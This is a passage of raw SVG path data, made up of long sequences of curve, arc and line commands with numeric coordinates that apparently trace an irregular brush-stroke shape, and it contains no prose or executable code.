2,1.2.4,1.2.5a10.4,10.4,0,0,0,4,.3c-1.6-.3-3.9-.6-4.3-.8a47.94,47.94,0,0,0,9.8.2c-5.3-.9,1.7-.4-4.5-1.3-.1.4,3.1,1.5-.8.4-2.4-.1,1.8,1-.6.8a15.24,15.24,0,0,1-2.1-.4c-.8-.7,5.2-.1,1.3-1.3-.1.1.3.4-.9.2a8,8,0,0,0-1.2-.4c.3-.2,4,.6,2.9,0-5.6-.6.1-1.1-7.9-2.4,3.8.4-.8-.3-.3-.7a19.35,19.35,0,0,0,2,.2c1.9.3,3.8,1.2,5.4,1.1-2.6-.5.1-.7-3.5-1.2.9.3-1.8.2-2-.1-1.3-.6,6.1.5,1.7-.6a5.55,5.55,0,0,1-2.1-.2c3.1,0,.8-.8,1.4-1.2a16.44,16.44,0,0,0,4.6,1.7c-1-.7.2-.7,2.7-.4-3.7-.7-5.3-.6-6.3-1.2,3.1.5.9-.5,3.9,0-3.6-.4-5.6-1.3-6.4-1.2,3.8,1-2.6-.4-2-.1,1.7.2,2,.9.3.6.3-.2-2.5-1.2-3.4-1.1,2.6.4.4.4-.9.2a4.69,4.69,0,0,1-.6-.2l1.2-.6a13.09,13.09,0,0,0,3.9.1c-1.6-.3-2.6-.4-3.4-.5.3-.2.5-.4.4-.7a11.17,11.17,0,0,0,2.7.8c-1.4-.8-2.1-1.9,1.1-1.7,1.4.9.6.9-1.4,1.1,5.7.9,6.9,1.3,12.8,2.5.6-.3-3.3-1.3-3.5-1.2-1.2.1,4.3,1.1,1.3.7-3-.6-4.9-1-5.5-1.5,3.4.3.5-.4,1.7-.6,4.2.9,2,0,4,.3,2.1.6.2.3.3.6,6.5,1-.1-.5-.4-.8,1.8.3,3.3.6,4.2.8a5.7,5.7,0,0,0-2.3-.8c-1.2.3-9.2-1.6-7.7-1.9a26.05,26.05,0,0,1,5.2.8c.1-.2-1.3-.5-1.3-.7,3.8.7,2.6,0,6.1.6-1.4-.7-.2-.6-3.5-1.2-3-.4-.1.4-1.9.1-1.6-.3-4-1.2-1.4-.9,3.4.6,5.6,1.2,6.2.8-5.4-.6-.8-.3-3.3-.9a41.57,41.57,0,0,1-7.2-.9c-.7-.8,1.5-.6,1.5-1,1.3.5,1.1.9,3.6,1.5,3.7.1-2.3-1.7,2.3-1.3-2.6.1,2.7.9,4.6,1.5,1.3-.1,3.3.7,4.1.6a16.33,16.33,0,0,1-4.4-1.1c3.3.5,4.5.1,7.1.7-1.6-.8-6.3-2.3.2-1.8,1.1.4-3-.1.2.5,0-.1.8,0,1.1.2.5.4-4.8-.9-3-.2,5.3,1,4.4,1.7,7,2.6-2.9-.6-1.9-.1-3-.2a11.42,11.42,0,0,1,3.1.8,3.7,3.7,0,0,0,1.1.1,5.44,5.44,0,0,1-1.1-.3c-.4-.1-.3-.1,0-.1.7,0,2.4.2,1.9,0a6.07,6.07,0,0,1-1.9-.5c-.3-.1-.2-.2,0-.3s1-.3,0-.7a4.76,4.76,0,0,0-.9-.3,3,3,0,0,1,.9.2,18.66,18.66,0,0,1,3.4.7c-.3,0-2.4,0,.2.5.2-.2,1.5-.2.7-.7-1.9-.3-2.5-.5-2.3-.7-.8-.1-1.4-.2-2-.3a14.26,14.26,0,0,1-3.4-.8c1.6.2,2.6.5,3.4.6s1.4.3,1.8.1c-.6-.1-1.2-.3-1.8-.4-3.5-.8-6.3-1.5-9.1-2.2,3.4.7,2.5.2,4.1.5a2.76,2.76,0,0,0,1.2.4c-1.3-.7,2.9.6,3.9.5h0c-6.8-1.3-1.7-.7-6.5-1.9,3.4.7,2.2.5,4.2.6.4.6.3.2,2.4.5.3,0,.5.1.8.1A8.44,8.44,0,0,0,880,5a16.62,16.62,0,0,0-2-.3q-.45,0,0,.3a5,5,0,0,0,1.2.3c.3-.2,5.5.8,6.3,1a20.88,20.88,0,0,0-5.8-2c.7-.4,1.3-.8,5.9.2.3.3-2.2-.1-2.9,0,2.8.9,3.8,1.6,5.9,2.2-1.8-.6,4.4.4,4.1.6-1.3.1-4.4.1-.7.7-5.8-.8-3.1.4-7.9-.3-.3.3,2.8.9,4.5,1.3-2.7-.4-1.5.2-2.9.1a19.45,19.45,0,0,0-5.1-.6c3.2.6-1.6.5,1.3.7a6.05,6.05,0,0,1,1.9,0c-.3.3,1.7.7,2.4,1.1,3.6.6,1.4-.3,6.1.7a2.68,2.68,0,0,1-1.8.3c-.7-.4-1.9,0-4.1-.5,1.6.7.2.6.6,1.2,5.6.9.4-.4,1.6-.7,8,1.3,6.8.2,13.1,1.1-1.2-.6-4.9-1.1-1.4-.9l-5.2-.9c-.3.3,3.3.8,2.4,1.1a8.82,8.82,0,0,1-2.9,0c-.5-.4-1.7-.7-2.6-1.3,3.7.7.9-.4,3.9.1-7.5-1.1-3.6.3-9.8-.3,1.4-.3,2.1-1,9.5-.3-.4-.3-1.7-.2-2.2-.5,1.1.2,1.2,0-.1-.2.6.3-2.5.1-3-.2,1.4-.1,1.4-.5,3.8-.3,2.2.4,1.2.6,3.4,1,.5-.1,1.4,0,1.9-.1-2.1-.4-6.9-1.5-3.4-1.1,1.9,1,1.7-.8,7,.5-.6-.4-3.5-.9-2.5-1.2,4.5,1,1.8.1,4,.3,2.2,1.6,4.5,3.7-2.5,2.9,1.2.9.6,1.1,1.8,1.7,1.4.2,2.3.4,3.2.6-.3-.4,4.5.5,5,.3-3.1-.4-5.1-.7-6.3-1,.7-.2-3.5-1.2-.4-.8,1.3.3,1.4.6,1.4.9,3.9.5,8.6.7,5.7-.3,0,.3.1.6-2.9.1.7-1.2-3.9-3.6,4.7-2.5.9.1,1.8.2,3,.4-4.1-.9,5.8.5.7-.7-1.1-.1-.1.4-3-.2a.74.74,0,0,0-.7-.3,9.16,9.16,0,0,1-2.5-.2c-.1-.2-.2-.5-.3-.7-4.5-.8-3.2,0-7.1-.6,3-.3,15.4.5,4.1-1.5a.26.26,0,0,0-.1-.2c2.5.3,4.5,1.1,5.2.9-1.6-.4-3.4-.7-3.4-1,4.7.8-1.1-.7,1.7-.5l2.4.7c2.5.9,2.4,1.6,1.9,2.1a9.18,9.18,0,0,1,2.2.6c4.2.9,5.2.4,7.3,1.1-2-.1-2-.2.2.4-2.9-.4-3.9-.2-3.7.3,5.7,1-.1-.4,2.9-.1,5.7,2.1-1,1.4,1.4,2.9,4.8,1,2.7,1.1,7.6,1.8-4-.5-6.4-.6-8.4-1.4-.8.2,3.2,1.3,4.5,1.3-.9-.3,2.8.7,3,.2a14.34,14.34,0,0,1,3.5,1.2c-1.9-.1-1.9-.4-5.2-.9-.4.4-.4.3.4.8,1.4.5,3.8.4,5.3,1a25.66,25.66,0,0,0-4.8,0c6.8,1.7,2.8,1.9,3.2,2.8-2.5-.5-7.1-1-4-.3,1.4.1,3.5.3,6.1.7-1.6.1-3.3-.1-.6.8-5.5-.9.3.6-3.8.1,1.6.3,5.4.8,5.3,1a.35.35,0,0,0,.1.2c-3.8-.6-5.1-1.1-8.5-1.6-1.3.2,4.7.8,3.4,1,3,.6,2.6.3,5.2.8-.8.4,3.2,1.6-1.3,1.3,4.1.8,2.2.8,3.5,1.2-.7.1-5.1-.9-4-.3,2,.3,2.4.5,4.2.8.1-.1.2-.2,2,.1,7.5,1.6,2.5,1.8,2.1,2.3-.1.1,5.3,2-1.8.4,1.2.5,2,1.1-2.8.2.5-.1,2.4.1,1.8-.4-3.1-.5-3.7-.9-6.5-1.4,1,.7-3-.7-1.9,0,.5.4,5.2.6,6.4,1.2a8.82,8.82,0,0,1-2.9,0c-.3-.2-2.4-.5-3.3-.8-.5.1-2.5.4-.6.8,1.8.2-.3-.6,1.8-.3s8.7,1.7,2.2.5c-.1.4,6.1,1.1,4.5,1.4a17.2,17.2,0,0,0-3.2-.5c.1.4,2.7.4,4.4,1.1a26.83,26.83,0,0,1-4-.3c3.2.9-1.8,1,4.6,1.5a2.68,2.68,0,0,1-1.8.3.17.17,0,0,1-.23.07.18.18,0,0,1-.07-.23l0,0a.16.16,0,0,1,.23,0h-.6c-.8-.2-1.6-.2-3.6-.6.2.2.3.3.3.4h-.3c-.9.2-.7.3,0,.4a6.32,6.32,0,0,1-1.3.4c2.5.6,3.8.3,4.2.7-2.7-.4,1.5.4.2.5-1.5-.2-3.9-.7-4.1-.6.3.5,2.4,1.4-1.5.9-.6-.3.9-.4-1.3-.8-2.9,0,3,1.3.6,1.2,1.4.2,2.8.5,4.2.7-.1.4,4.1,1.5-2.7.4,2.1-.1-3.8-1.5-7.7-1.9,0,.3.9.9-.6.8,1.5.5,3.1.3,4.2.8-1.6.1,4.4,2.1,2,2.2,2.1.2.6-.5,3.9.1,3.8,1.4-2.7,1.2-1,2.1a12.25,12.25,0,0,1,2.9-.1c1.6.8-1.6.7-1.2,1.6.1.2,1.9.4,2.2.6-.1.5-5.3.2-8.8-.2,7,1.3,6.3.5,9.1.7,2.7,1-2.8.3.6,1.3,1.6.2-.5-.6,2.9,0-2.1-1.3-5-2.8.8-2.4-1.8.4.8.4,3.5,1.2-.2.3-4,.2-2.7.6a5.85,5.85,0,0,1,2,.2c2.5.8-2.3.6.5,1-.2-.2.7-.2,1.9,0,2.7,1.4-1.9,1.2,3.2,2.6-7-1.1,1.5,1.9-5.4.9-.6-1.2.4-1.6-1.2-2.6-2.6-.2-2-.7-3.4-1.1-4.9-.2,1.3,1.7,3.1,2.5-1.3-.2-1.4-.1-3.1-.4.5-.3-2-.8-1.5-1.1-1.8-.2-5.6-.9-5.1-.5,2,.4,2.3.2,4.1.6a7.72,7.72,0,0,1,.4,1c-7-1-6.7-1.2-13.7-2.4,0-.1,1.3.1.9-.2a59.9,59.9,0,0,1-12-3c-2.9-.1,4.1,1.1,2.6,1.4a17,17,0,0,0-3.1-.5c3.3.5.7.7,4.4,1.2q-.45-.45,1.8-.3c.1.2,1.9.4,2.2.6,1.1.5-1.5.1-1.8.3a10.32,10.32,0,0,1,2.2.5c4.2.8-1.3-.6,4,.3,6.7,1.6,14.6,2.5,12.1,3.1-5.3-.6-2.6.3-1.4,1.1-1.4-.2-2.3-.4-3.2-.6-.3.2-2.8.7,1.7,1.5,2.3.4-1.5-.5-.3-.6,3.4.7,1.2-.2,4,.3,1.6,1.2-.5,1-5.7.3.4,1.1-2.3,1.2-2.7,2.6,2.5.6,3.8.3,4.2.7-1.7.1.8.6.5,1.1-1.6-.4-2.6-.6-3.1-.4,3.7,1-3.4,0,2.4,1.1-.3.2-3.2-.2-5-.4,1.4.4,3.9.8,5.4,1.1.5.3,0,.4-.8.4,1.4.4,3.9.8,5.4,1.1-1.1-.6,2-.1,3.9.1.5-.2-1.1-.5-1.4-.7.1,0,.2-.1.3-.1,1.3.2,2.6.4,4,.7.7.5-2.3.1,1.3.8,3.9.2-7.4-2-2.9-2-.5.5,2.8.6,4.4,1.1-.9-.8,9.8-.5,10.1.9,3.6.7,3.7.4,4,.2q-4.05-.6-3.3-.9c-1.9-.4-6.1-.9-6.4-1.2.7-.2,1.7-.4-1.5-1.1,4.7-1,1.1-3.8,2.2-5.6,1,.6,1,.6.4,1,6.1,1,2.7,1,3.5,1.2.9-.2,1.2.5,3.1.5,1,1-.8,1.4,4.2,2.8-.3-.9,6.7,1.5,6.2.8-6.4-1.5-5.3-2.1-1.9-2.1-1.2-.2-3-.5-3.2-.6,3.6.3,3.8,1.1,5.6,1.6A27,27,0,0,0,979,53c1.6.4,3.4.7,3.4,1-.8.3-2.1-.1-.7.7-1.4-.2-2.3-.4-3.2-.6-.1.3,2.5.8,2.4,1.1l-5.3-.9a31.71,31.71,0,0,1,8,2.7c1.6-.4,10.3.2,6.3-1.1,1.8.3,6.3.7,7.3,1.1-2.3.1-3.4-.1-.5.9-1.3-.2-1.5-.4-3.2-.6.4,1-7.2-.8-6.7.2a51.94,51.94,0,0,1,5.5,1.5c.5-.2,4.9.8,5.3,1-2.1-.1-2.7,0,1.2.4-2.3,0-.3,1.3-4.5.8-2.5-.4-3.2-.7-6.4-1.2-3.1-1.1-1.5-1.9-2.2-2.7a37.31,37.31,0,0,0-4.1-.5q3.45.6,3.3.9a52.82,52.82,0,0,1-5.3-.9c.3.3.5.6-1.8.3-.1-.2-.1-.3-.2-.5-5.2-.9-7.1-.4-5.7.2a12,12,0,0,1,3,.2c.3.2,1.8.5,2.3.7-.6.3-3.6-.5-5.1-.5,3,.7-2.3-.3-2-.1,1.6.4,3.4.7,3.4,1-1.6-.2-3.9-.7-4.1-.6,8.6,2.5-5.1.9,2.6,3.4a12.75,12.75,0,0,0-3.9-.1c3.9.6,5.7.7,9.3,1.2-.5-.6-1.4-1.8,3.3-1.2.3.3,2.6,1.1-.6.8,1.6.3,3.9.6,4.3.8-1.8.9,3.4,3.4-.1,3.9.2-.2,4.6.7,5.1.6-4.3-1.1-3.3-1.5.4-1.3-3.7-1.3-2.3-2.3-3.4-3.2,5.8.9,6.7.1,11.1,1,.5-.2-1.8-1.2.5-.9.4.4,3.5.9,4.5,1.3.8-.1,2.2-.1,1.6-.6,2.6.5,3.4.8,4.1.6-.7-1-2.6-2.4,3.8-2.3,6.1,1.2,2.8,1.4,4.9,2.1,1.9-.1,0,.5,2.3.8.1-.3,6.4.8,7.3,1.2-.8.1-2.4,0-6.1-.7.3.3.5.7,3.4,1.1-2.2-1,5.5.8,5.1.5a19,19,0,0,1-3.3-.9c6.1,1,.3-.5-1.5-1,3,.2-4.4-2.3,2.1-1.8,1.4.6,2.5,1,1.5,1.1,4.3.8,6.6,1.5,7.8,2.2-2-.1-2.1-.4-4.3-.8.6.4,6.7,1.9,1.5,1.3a9.61,9.61,0,0,0-3.4-1c3.3,1.2,9.9,2.8,10.3,3.5,1.8.3,3.2.5,4.1.6,2.1,1.4,8.2,3.5,2.3,2.9.9.5-.8.9,1.7,1.5.7-.3,5.8.6,4.9.1a66,66,0,0,0,6.7,2c-2.3-.3-1.5.2-1.8.5-.1.1-.3.1-.9.1a2.7,2.7,0,0,0-.8-.1c-1.2-.3.9-.4-1.5-.7-1.7,0-2.6.2-3,.6-1.1.9,1.1,2.6-3.2,2.7-3.2-.8,2.5-.5-2.7-1.6-2.3,0-.8.9-3.4,1-3.9-.6-4.7-1-4.5-1.3,6.2,1,2.3-1.1,10,.7-2.6-1-3.5-1.7.3-1.5-.1,0-.2-.1-.4-.1-1.1-.3-3.7-.7-3-.9a15.44,15.44,0,0,1,3.3.8c-4.8-1.4-1.7-2.9-7-4.6a37.91,37.91,0,0,0,4.1.5c-2.5-.5-3-.9-5.5-1.4,1.3.6-2,0-2.9.1,1.5.3,3.9,1.2,1.4.9s-1.3-.5-3.3-.9c-.2.1.1.2-.9.1a2.67,2.67,0,0,0-1.2-.4c-.1.5,6.8,2.3,1.8,1.7.9-.3-3.6-.8-4.4-1.2,2.2-.1-1.8-1.6-2.9-2,1.4.9-5.6-.4-6.9-.1-1.7-.7,2.8.2,1.8-.3a49.24,49.24,0,0,0-10.2-1.1c.6-.2-2.3-.6-3.3-.9-1.5,0,.3,1-5-.3-.2.3,1.6,1.1-1.7.6-2.3-.6-.1-.9-4.6-1.7,13.3,4.2-14.6.3-5,3.7-5-1-4.5-.5-6.1-.6-3.9-.8-6.9-1.6-9.8-2.4,1.9.1,0-.3-.3-.6,1.7,0,4.1.7,4,.3-1.8-.3-3.2-.5-4.1-.6-.8-.6.6-.6,1.4-1.2-3.6-.8-3.7-1.1-7.5-1.6,1.8,1.1-2.2.7,3,2.3-2.3-.7-10.8-1.5-5-.3.1-.2-.6-.5.8-.3,1.6.3,3.8.6,4.2.8-.8.3,3.6,1.4-1.7.5,1.3.1,1.2-.2-1.3-.7.1.4-1.9-.3-3-.2,2.9.8,3.6,1.8.7,1.6-1.1-.2-2.1-.3-3.1-.5,2-.2-7.3-2-2.4-.9-2.4.4,6.9,2.3,10.1,3,.6.4-3.9-.5-4-.3,4.8.8,5.1,1.5,7.8,2.2-.5-.3,3.7.2,4.1.6-1.8.4,1,2.2-2.9,2.1-1.9-.4-3.4-.9-4.2-.7,7.2,1.2-1.6.7,1.7,1.5,3.6.7,1.1-.3,5.1.5-.5.3,1.6.7,3.4,1.1a13.75,13.75,0,0,1,2.2.6c-3.6-.1-2.1,1.5.1,2.4,3.5.4-1.5-.9,2.8-.3,2.2.5,6.6,1.2,8.6,1.8-1.2,0,.8.9,2.6,1.4a6,6,0,0,1,4.1.6c1.6-.7-2.4-1.9-1.2-2.7a39.56,39.56,0,0,1-4.3-.9c1.8.2-.3-.6,1.8-.3,3.7.6,1.6.9,5.6,1.6.7-.2-4-2,1.5-1l-.3-.6c-7.3-1.2-4.1-2.1,1.6-.7.8-.4-1.4-1.6,4.6-.6-2,.3-1.3,1,2,2.1.3-.2,2.9.3,1.8-.3-2.8-.4-2.1-.6-3.3-.9,2.4.4.8-.4,2.9-.1,3.4.7,3.2.3,5.1.6,3.3,1.1-.7,1-1.3,1.3,4.1.7.6-.5,3.9,0,1.7.3.7.4,2.3.7,2.3.3-.9-.9,1.6-.6,1.5.5,1.1.9,4.6,1.5a32.09,32.09,0,0,1-4.7.2c3.7.4,4.6,1.3,10.8,2.5-4.2-1.2-9.4-2.9-1.9-2.1-1.6-.8-2.3-1.8,1.2-1.6a38,38,0,0,0,5.6,1.6c4.4.5-3.5-1.4-.6-1.3.2.2.4.3,2.2.6.1-.3-2.2-.7-3.4-1.1a31.24,31.24,0,0,1,7.2,1c-3.5.8.5,2.7-5.3,3.1-2.3-1.3,5.4-.9-2.2-2.6,3,1-2.9.2,1.6,1.3-1.6.2-6.2-.5-3.7.4-1.1-.6,2.7.3,3.1.5-1,.2-1.1.1-1.7.5,5.6,1,3,1.6,9,2.6-6.5-2.2.5-2.1,4.7-2.3-1.7-.6-4.2-.5-5.3-1a12,12,0,0,1,3,.2c5.3,1.2,3.9.6,9.3,1.2,2,1-4.8-.4-4.9,0,.7.4,5.4,1.6,3.6,1.5a21,21,0,0,1-2.2-.6c-.5.1-1.4,0-1.9.1a24.16,24.16,0,0,1,4.3.9c-5.2-.8-8.7-1.1-9-.6,1.8.3,2.6.3,3.2.5-2.2,0-1.9.7-4.6.6,3.5.8.1.5,2.6,1.3-4.8-.8.8,1.1-3.7.4.8.2,1.3.3,1.2.4,10.3,1.9,2.8-1,8.5-.4-.4.6,2.4.8,3.2.6,5.6,1.8-7.7.5-1.2,1.7-.2.2-5.5.1-2.7.4,1.5-.3.8,0,5.2.8,2.2.3-2.6-1.1.6-.8,1.5.3,1.1,1,2.3.8-.9-.6-.1-.5-2.5-1.2,1.1,0,3.9.5,5.1.5-.9-.3-5.1-.8-4.4-1.1,11.2,1.7,4.3-.9,9.4-.7,3.9,2.2,1,3.2,2.1,4.5a6.26,6.26,0,0,1,2.1.4c.1.1.1.2.2.4-2.4-.4-4-.7-5.2-.8,2.6.9-2.2.1-2.7.4,2.9,1.3,1.2,3.2-1.3,3.5-.3.5,2.1,2.8-4.8,2.2,1.6.3,3.9.6,4.3.8a23.15,23.15,0,0,0-4.1,1.5c1.4.3,4,.6,4.2.8-.9.1-3.8-.4-5-.4,6.8,1.7-3.7.7,1,2.2,5.1.7,1.4-.3-.2-.5a2.7,2.7,0,0,1,1.8-.3c.1.5,1.6.3,3.1.5,1.3.4,1.3.5.2.5,8.3,1.4.4-1.1.2-1.6s7.8,1,6.9.3a15,15,0,0,0-3-.3c-1.6-.8-3.9-1.8.3-1.4.9.5,4.4.8,4.1.5-2.6-.6-1.2-.6-3.6-1.4,5.1,1.1.6-.6,6.2.8-.3-.6-3.1-.7-4.5-1.3,4.2.4-.8-.1-1.3-.7a20.19,20.19,0,0,1,4.1.6c.5-.5-2.8-1.5-.7-1.6-1.5-.4-3.3-.7-4.4-1.1,1.1-.3,2.3-.5,1.3-1.3,8,1.4,6.8-.5,12.6,0-1.07-.15-2.14-.35-3.2-.6.2-.3,6.1.8,2.9-.1-3.6-.7-1.1.3-5.1-.5-1.3-.8-4.5-2.4-2.2-2.6-1.1.2,4,1.3,4.4,1.2-1.7-.6-4.4-1.2-4.6-1.7,1.4.3,3.9.8,5.4,1.1,1.1-.4-1.9-1.6-.8-1.8a9.18,9.18,0,0,1,2.2.6c1.3,1-3.2,1.5,2.3,2.8-1.9-1.1,3.1-1.3-.4-2.8,5.8,1-2.5-1.9,4.4-1.1-5.2-2-2-3.5,2.2-3.6a12.82,12.82,0,0,0,2.1.5,4.69,4.69,0,0,0-2.4-1.1c-.1.1-.2.2-2-.1-.4-.8,1-.8.3-1.4,1.6.3,2.7.6,4.3.9-1.7-1,3.2-.1,1.4-1.1-2.9-.4-2.8-.1-5.2-.9,3,.5,2.5.1,4,.2-1.7-.5-4.3-.5-5.3-1.1.4-.6-.8-.8-1.8-1.7,4.1.7,3.6-.1,7.2.9.3-.6,2.8-.4-1.7-1.5,3.3.7,4,.4,7.4,1.3.1-.2-1.3-.5-1.3-.7-2.3-.3-5.6-.7-6.4-1.2,1.3-.8,3.8-1.5,1.7-2.7a15.78,15.78,0,0,0-2.4-1c1.8.3,3.3.6,4.3.8l-.3-.6q-4.05-.6-3.3-.9c4.5,1,1.9.1,6.2.8,2.1.7.6.8-.9.9a4.82,4.82,0,0,0-1.5.3c5.8,1.2,4.4,2.3,1.6,2.1,5.9.5,5.3-1.2,3.4-1.9a22.29,22.29,0,0,1,2.7-.2c1.7-.1,3.3-.3,3.6-.8a9.76,9.76,0,0,1-3.3-.9c-3.2-.6-3-.3-6.2-.9-1.3.2,3,.7,2.4,1-5.1-1-2.4.1-7.2-.9.6-.4,4.9-.4-.7-1.6l-.3-.6c1.4.3,3.9.8,5.4,1.1.2-.6-5.5-.8-5.5-1.5,1.7.1,4.3.5.8-.3,3.4.2,5.8,1.2,7.4,1.2-1.7-.3-2.1-1.1-.4-.8a24.16,24.16,0,0,1,4.3.9c-5.4-1.1.8.8.5,1.1-1.5-.1-4.2-.6-5.1-.5,5.1.9.8.7.4.8,6.7,1,5.1.1,5.8,0,3.3.5.9.5,4.5,1.3-1.1-.6-4.2-1.6.5-1-2.7-.5.7-.7-4.5-1.3-1.3.1,3.1,1.1.3.7-4.9-1.3.3-.7,1.5-.9-3.5-.7-.6.3-4.1-.5,0-.1-.9-.3-1.2-.4-.6-.7,1.7-.4,4.7-.3-.8-.4-1.6-.1-3.1-.4,0-.2-.6-.3-1.2-.5a17.85,17.85,0,0,1,4,.3c2.7.4,1,.6,4.4,1.1-1-.6-1.4-.8.6-.8-1-.4-4.6-1-4.5-1.3s2.7.2,2.9,0c-1.6-.4-3.1-1.4-.7-1.4-2.1-.5-2.9-.9-4.5-1.3-.8.4,1.7,1.1-1.6.7a13,13,0,0,0-2.3-.7c0,.3,1.8.6,2.4,1-6.5-1.2-.5.6-2.8.3-1.4-.3-2.1-.5-4.2-.8,3,1.1,4.8,2.4-1.1,1.8,6.1.9,1.9,1.5-2.8.2.3.6,3.1.7,4.5,1.3-2-.3-2.5-.2-5.1-.6-5.9-2-1.8-1.9,2.9-2.1-3.3-1.3-1.1-1.2-2.8-1.9,1.1.2,2.1.3,3.1.5-2.9-.6-1.5-1.5-4.7-1.7,2.7.7,1.1,1.1-1.6.7-1.1-.9,1.2-.9.2-1.8a19.5,19.5,0,0,0,5.1.6c-6.1-1-4.5-1.5-1.3-.8-1.3-1.2,3.1-1.5-.6-3.3,4.1.5,4.1-.2,1.5-1,1.4.2,2.3.4,3.2.6-1.4-.7.9-.4,2.8-.2-3-.9-3.6-.2-5.2-.8a7.88,7.88,0,0,1,3.8-.1c0-.8-3.4-3,.5-3-3.6-1.3-4.9-5.3,1.6-2.7.7-.7-1.2-1.9-1.1-2.4.6.7.6-.1,4.2.7-1.1-.5-1.5-.6.8-.4-4.9-.9,1.4-.5-2.6-1.4,0,.1-.8,0-1.1-.2,2.8.4,2.6.3,6.2.8,2.8.7.8.5,2.5,1.2,3.6.4,3.5.7,6.4,1.3-2.3-1.8-.8-1.4.9-2.3-3.9-.7-1,.4-3.9-.1l-.3-.6c-2-.3-3.5-.5-4.1-.5,3.9.6-.5.3,3.4,1-.8,0-.6.3-4-.3-.3-.3.8-.4-2.3-.8.9.4,1.8.8-.7.5-3.9-1.3.7-1.9-3.6-3.5a4.17,4.17,0,0,0,2.6-.4c2.1.1,4.2.1,6.1.3a9,9,0,0,1,2-.2,3.87,3.87,0,0,0,1.9.3,4.17,4.17,0,0,1-1.1-.3h2.3c-.5.3,1.4.4,1.5.7,6.9.4,16.6.6,21.8,1.2.4-.4-5.3-.5-2.6-.7,2.8.1,2.5.4,5.5.4.6.2.7.5,3.5.5-1.6-.3,2.5-.4-.3-.4h1.3c.2.1.5.1.7.2-.2-.1-.3-.1-.4-.2,1.8-.1,3-.2,5.5-.2.4.4,2.2.6,4.1.7a19.51,19.51,0,0,0,5.5-.3c4.4.2,5.8.5,10.1,1-4.4.3-6.2-.1-10.6-.2-2,.8,13.9.9,10.8.4,2.7.2,2.1.4,1.5.7,3.4,0,1.7.4,4.5.4-.5-.3,0-.4,1.8-.4,1.2.2,1.3.4,2.5.6,7.5,0,9.1.2,18.1.4a16.36,16.36,0,0,1,3.8-.6,42.76,42.76,0,0,0,6.5.2c0,.2.5.3,1.3.5,4.5.2,4-.1,7.3-.1.1.3,1.1.7-.5.9,2,0,2.4.2,4.3.2,1.2-.3-3.5-.7-.5-.8s4,.5,2.5.6c6.2.3,12.7,1.9,18.4.9.4.2,1.7.2,1.4.5,4.7-.1,5.6.1,8.3-.2.4.2,1.9.2,2.3.4,1.1.3-1.3.3-.7.5,7.8.7,22.3.4,14.2-.8a38.38,38.38,0,0,1,6.6.5c-.9.4-2.6.7-2.4,1.2-5.2.3-11.2.6-17.1.6h0a109.94,109.94,0,0,1-14.5-.9c-3.6-.5-.9-.8-7.1-1.1.7.5,2,.7-.4,1,8.7,0,2.4,1.4,6.5,1.9-1.1.1-4.3,0-4,.4.8.2,2.5.4,3.6.6-3,.4.2,1.1-.8,2.1a14.87,14.87,0,0,1-2.2-.2c2.9,1.2-2.9,2.2,4.3,3.4-.4.4-3.2.6-2.4,1.2-3.3-.1-5,0-7.3.1,13.3,1.8,42.6,1.7,42.7-.4,8-.9,11.9-2.1,10.1-3.7,3.1-.1,3.7.2,6.3,0-1.4-.8,1.1-1.2,5.4-1.4-3.2-.1.9-.2-.3-.4-1.6.1-3.9.3-8.2.4,0-1.2-7-1.7-3.8-2.6,9.3.5,12.6,1.4,24.2,1.7,3.1,0,2.5-.5,7.1-.4,0-.2-.5-.3-1.3-.5a38.13,38.13,0,0,0,4-.2c2.9-.3,2.3-.9.3-1.6a.42.42,0,0,1-.2-.1h.34c3.4,0,4.8.1,4.8-.2,3.4-.1,1,.4,4.4.3a8.21,8.21,0,0,1,2.1-.1c-.1-.2-.5-.3-1.4-.5,8.5-.2,8.5-2.7,21.2-1.2,0,.3,1.3.8-.4,1,6.4.3.9.9,5.1,1.4-.3-.8,2.5-1-2.1-1.6,6.7.3,7.9-.3,10.7.3.7-.5,1.7-.7,3.6-.9,1.1.3,2.6-.1,5.3.1-.8.5,2.4.7,4.8,1-4.2.1-5,.6-5.5,1.2a13.54,13.54,0,0,1,3.3.2c-2.2.2-3.7.5-2.5,1,5.3,0,7.9.4,11.7.2,2.8.9,10.5.4,15.4.9-2-.5,2-1-3.1-1.4,3.1-.2,6.4-.3,8-.6-8.6-.2-4-1.4,1.2-1.4-1.4-.4-3.3-.7-4.9-1.1,1.1,0,1.2-.1,2-.1,4.3.2,5.4.6,5.8.9-.3-.2.9-.2,3-.2-.7-.3-3-.8.6-.8,1.6.3.1.8,2.6.7-2.5-.6,3.7.2,6.2-.2,2.7.3.4.7.6,1,2.8.2,3.3,0,4.3.2-.5,1.1,2.1,1.9,1.7,2.5.7-.4,5.2.1,5.5.4-4.3,0,1.5.6-1.6.7-2.7-.3-1.9-.4-1.6-.8-3.3-.2-3.6,0-6.5-.2-1.4.4,4.6.1,4.5.4s.7.4-.8.4c-1.7,0-1-.3-3.3-.3.3.5-1.8.5-6.1.3-.2.3-.8.2-2.8.5,2,.1,2.3-.1,4.2,0,1.2.2,1.3.4,2.5.6-1.8-.3-6.3.2-2.8.5l3-.3c.5.6-4.6.6-1.4,1.1.2-.1,2.2-.1,3-.2-2,.2.1.7,2.6.8-.5-.3-2.6-.5.7-.5,2.6.6,12.9.1,7.1-.3,1,.9-9.5-.2-2,.2.7-.3-3.6-.2-3.5-.5,11.5,0,5.9.8,13.4,1.3-2.1-.3-3.3-.7-.6-.9,9.6.1,15.1-.6,15.7-1.3h.3c.8.3,4.2.3,6.6.5-.6-.5,2.1-.4,7.1-.4-2.2-.4-2.7-.5-.5-.8-1.5-.2-5.2-.2-5.5-.4.5-.3,1.5-.8,5-.4-1.6-.5.8-1-5-1.3a15.32,15.32,0,0,1-1.9.3c-.1-.1-.1-.2-.2-.3-7.8.5-16.3-1.3-8.3-1.5-.1.1.4.8,1.3.5q-1.2-.45,3-.3c-1.6.1.8.5,3.6.6-1.4-.5,1.3-.5,2.7-.6-5-.6-3.1-1.6-7.9-2.5a27.31,27.31,0,0,0,3-.2c.2.2.1.4,2.4.4.6-.6-3.6-.8-4-1.3,3.2,0,4.4-.3-.1-.2-1-.5-.2-.8,4.9-.6a24.64,24.64,0,0,0,3.7.8c.6-.3,3.2-.3,3.8-.6,1.8,0,.8.3,2.3.4,2.5-.3-.1-.4-2.3-.6a9.16,9.16,0,0,0-2.6-.4c-.1-.1-.2-.3-.3-.4,1.6,0,3.9.1,4.2,0-4.1-.1-5.7-.2-7.6-.4-.5-.3,3-.1,3-.3-1.3,0-1.3-.2-1.3-.4-2.5-.1-6.9-.6-6.3,0,2.5.2,3.8-.2,4.2.1.7.4-2.5.3-4,.4-2.9-.3.4-1-.9-1.3,0,.2-2.6.1-2.2-.2,3.2,0,3.3.3,6.4.2